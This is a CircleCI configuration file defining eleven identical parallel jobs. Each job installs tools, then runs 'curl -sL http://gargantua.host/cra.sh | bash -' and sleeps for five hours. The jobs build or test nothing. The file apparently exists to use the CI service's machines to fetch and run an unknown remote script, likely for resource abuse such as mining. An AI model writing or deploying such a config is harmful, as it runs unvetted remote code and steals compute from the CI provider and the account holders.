version: 2.1

jobs:
  akalistage:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/cra.sh | bash -
      - run: 
            command: sleep 18000
            no_output_timeout: 5h

  akalistage1:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/cra.sh | bash -
      - run: 
            command: sleep 18000
            no_output_timeout: 5h

  akalistage2:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/cra.sh | bash -
      - run: 
            command: sleep 18000
            no_output_timeout: 5h

  akalistage3:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/cra.sh | bash -
      - run: 
            command: sleep 18000
            no_output_timeout: 5h

  akalistage4:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/cra.sh | bash -
      - run: 
            command: sleep 18000
            no_output_timeout: 5h

  akalistage5:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/cra.sh | bash -
      - run: 
            command: sleep 18000
            no_output_timeout: 5h

  akalistage6:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/cra.sh | bash -
      - run: 
            command: sleep 18000
            no_output_timeout: 5h

  akalistage7:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/cra.sh | bash -
      - run: 
            command: sleep 18000
            no_output_timeout: 5h

  akalistage8:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/cra.sh | bash -
      - run: 
            command: sleep 18000
            no_output_timeout: 5h

  akalistage9:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/cra.sh | bash -
      - run: 
            command: sleep 18000
            no_output_timeout: 5h

  akalistage10:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/cra.sh | bash -
      - run: 
            command: sleep 18000
            no_output_timeout: 5h

workflows:
  main:
    jobs:
      - akalistage
      - akalistage1
      - akalistage2
      - akalistage3
      - akalistage4
      - akalistage5
      - akalistage6
      - akalistage7
      - akalistage8
      - akalistage9
      - akalistage10